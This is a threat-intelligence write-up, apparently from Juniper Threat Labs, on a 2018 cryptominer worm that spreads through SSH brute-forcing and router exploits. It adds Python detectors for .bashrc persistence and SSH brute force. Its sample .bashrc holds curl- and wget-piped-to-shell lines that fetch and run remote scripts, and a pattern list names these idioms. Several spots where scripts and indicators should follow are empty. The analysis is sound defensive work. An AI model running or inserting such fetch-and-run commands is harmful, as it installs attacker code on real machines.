On September 19, 2018, Juniper Threat Labs discovered a new wave of attacks from a cryptominer worm targeting Linux servers, home networking devices, and IoT devices. The worm bundles a number of exploits so that it can spread rapidly and widely. The attack has three parts: infection, mining, and spreading.
A compromised machine downloads the following script from 185[.]10[.]68[.]163:
The site 185[.]10[.]68[.]163 (or petey[.]cf) is a clone of a legitimate business website. It hosts the malware for the attack and acts as a command-and-control server. The compromised machine downloads two Linux shell scripts, miner.sh and scanner.sh, which are then executed in the background.
The mining script is as follows:
First, the worm attempts to download and run two open-source cryptocurrency miners: one built for Linux on x86 hardware and one for ARM-based Linux systems such as the Raspberry Pi or IoT appliances. Both mine CryptoNight-based coins such as Monero. These coins are popular with cryptominers because, unlike Bitcoin, the CryptoNight algorithm can be mined efficiently on general-purpose CPUs, which turns commodity servers and embedded devices into usable mining hardware.
After launching both cryptominers (at least one of which will fail because it was built for the other architecture), the worm achieves persistence by overwriting the user’s .bashrc startup script, so the miner is relaunched every time an interactive shell starts:
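Persistence through a shell startup file is cheap for the attacker but also easy to hunt for. The following Python is an added example, not code from the original post or from the worm, that scans the text of a .bashrc for the download-and-execute idioms a dropper like this one relies on (a downloader piped into a shell, a URL pointing at a bare IP address, detached background jobs, discarded output, decoded or eval'd payloads). The sample .bashrc, its hostnames and its addresses are constructed for the demonstration; the page does not reproduce the worm's actual persistence line.

```python
import re

# Constructed sample .bashrc for the demonstration. The worm's real persistence
# command is not shown on the page, so these lines are invented; the IP is from
# the documentation range, not the campaign's infrastructure.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
case $- in
    *i*) ;;
      *) return;;
esac
alias ll='ls -alF'
export PATH="$HOME/bin:$PATH"
nohup bash -c 'curl -fsSL http://198.51.100.23/miner.sh | sh' >/dev/null 2>&1 &
wget -q -O- http://example.test/scanner.sh | bash &
"""

# Each pattern is paired with a short explanation that a triage note can quote.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
     "downloader piped straight into a shell"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
     "URL with a bare IP address instead of a hostname"),
    (re.compile(r"\bnohup\b.*&\s*$"),
     "background job detached from the terminal"),
    (re.compile(r">\s*/dev/null\s+2>&1"),
     "output deliberately discarded"),
    (re.compile(r"\b(base64\s+(-d|--decode)|eval\s+\$\()"),
     "decoded or eval'd payload"),
]


def find_suspicious_bashrc_lines(text):
    """Return [(line_number, line, [reasons])] for lines matching any pattern.

    Comment and blank lines are skipped. A line matching several patterns is
    reported once with every matching reason, so the reviewer sees how many
    red flags it raises rather than just that it matched.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = [why for pattern, why in SUSPICIOUS_PATTERNS if pattern.search(line)]
        if reasons:
            findings.append((lineno, line, reasons))
    return findings


if __name__ == "__main__":
    for lineno, line, reasons in find_suspicious_bashrc_lines(SAMPLE_BASHRC):
        print(f"line {lineno}: {line}")
        for why in reasons:
            print(f"    - {why}")
```

In practice the same check belongs on every shell startup file the worm could have touched (.profile, .bash_profile, /etc/profile.d/*), and a .bashrc whose modification time is newer than the user's last legitimate login is worth a look even when no pattern fires.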
The second task is to spread the infection as widely as possible. Although the mining script downloads binaries for both x86 and ARM, the propagation portion of the attack works only on x86-based machines.
ZMap is a popular open-source tool for scanning the internet for available services. The scanner.sh script tries to intercept local network traffic and uses ZMap to scan for services listening on ports 80 (HTTP) and 22 (SSH). It then passes these lists of targets to the bruteforce_ssh binary. In addition to brute-forcing username/password combinations for SSH access, bruteforce_ssh also attempts remote code execution exploits against a variety of web applications, home routers, and IoT devices:
In this captured traffic, we have identified the following exploits being used by this worm to spread.
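The SSH brute-forcing described above leaves a trail in the target's sshd log long before any miner starts. The following Python is an added example, not code from the original post or from the worm, that parses OpenSSH syslog lines, flags source addresses that reach a threshold of failed logins inside a sliding time window, and marks the worst case: a flagged source that later gets an "Accepted password", meaning the guessing worked and the host should be treated as infected. The auth.log excerpt, hostname and addresses are constructed for the demonstration and are not the page's indicators.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log excerpt in OpenSSH syslog format (the year is
# omitted, as in real syslog). Addresses are from the documentation ranges.
SAMPLE_AUTH_LOG = """\
Sep 19 10:00:01 web01 sshd[2201]: Failed password for root from 203.0.113.7 port 51234 ssh2
Sep 19 10:00:02 web01 sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 51236 ssh2
Sep 19 10:00:02 web01 sshd[2205]: Failed password for invalid user pi from 203.0.113.7 port 51238 ssh2
Sep 19 10:00:03 web01 sshd[2207]: Failed password for root from 203.0.113.7 port 51240 ssh2
Sep 19 10:00:04 web01 sshd[2209]: Failed password for invalid user ubnt from 203.0.113.7 port 51242 ssh2
Sep 19 10:00:05 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51244 ssh2
Sep 19 10:00:09 web01 sshd[2213]: Accepted password for root from 203.0.113.7 port 51250 ssh2
Sep 19 10:02:11 web01 sshd[2301]: Failed password for alice from 198.51.100.5 port 40022 ssh2
Sep 19 10:02:40 web01 sshd[2302]: Accepted publickey for alice from 198.51.100.5 port 40023 ssh2
Sep 19 10:30:00 web01 sshd[2401]: Failed password for root from 192.0.2.9 port 60001 ssh2
Sep 19 10:45:00 web01 sshd[2402]: Failed password for root from 192.0.2.9 port 60002 ssh2
Sep 19 11:00:00 web01 sshd[2403]: Failed password for root from 192.0.2.9 port 60003 ssh2
Sep 19 11:15:00 web01 sshd[2404]: Failed password for root from 192.0.2.9 port 60004 ssh2
Sep 19 11:30:00 web01 sshd[2405]: Failed password for root from 192.0.2.9 port 60005 ssh2
"""

# "invalid user" is optional: sshd inserts it when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2018):
    """Parse one sshd syslog line into a dict, or None if it is not a login event.

    Syslog carries no year, so the caller supplies it (assumed 2018 for the sample).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_ssh_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside any window_seconds span.

    Returns {ip: {"failures": total, "users": sorted usernames tried,
                  "success_after": True if a login succeeded after flagging}}.
    """
    recent = defaultdict(deque)  # ip -> failure timestamps within the sliding window
    stats = defaultdict(lambda: {"failures": 0, "users": set(),
                                 "flagged": False, "success_after": False})
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        s = stats[ev["ip"]]
        if ev["result"] == "Failed":
            s["failures"] += 1
            s["users"].add(ev["user"])
            q = recent[ev["ip"]]
            q.append(ev["ts"])
            # Drop failures that fell out of the window relative to the newest one.
            while (q[-1] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                s["flagged"] = True
        elif s["flagged"]:
            s["success_after"] = True  # the brute force paid off
    return {ip: {"failures": s["failures"], "users": sorted(s["users"]),
                 "success_after": s["success_after"]}
            for ip, s in stats.items() if s["flagged"]}


if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, info)
```

Note the third source in the sample: five failures spread fifteen minutes apart never trip the default 60-second window, so a worm that throttles its guesses slides past a naive rule. Running the same detector with a window of an hour catches it, which is why brute-force rules are usually layered at more than one time scale.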
The malware used in this campaign is detected on Sky ATP as Linux:Trojandownloader:Cryptominer and on JATP as LINUX_BRUTEFORCESSH.
IPs and domains: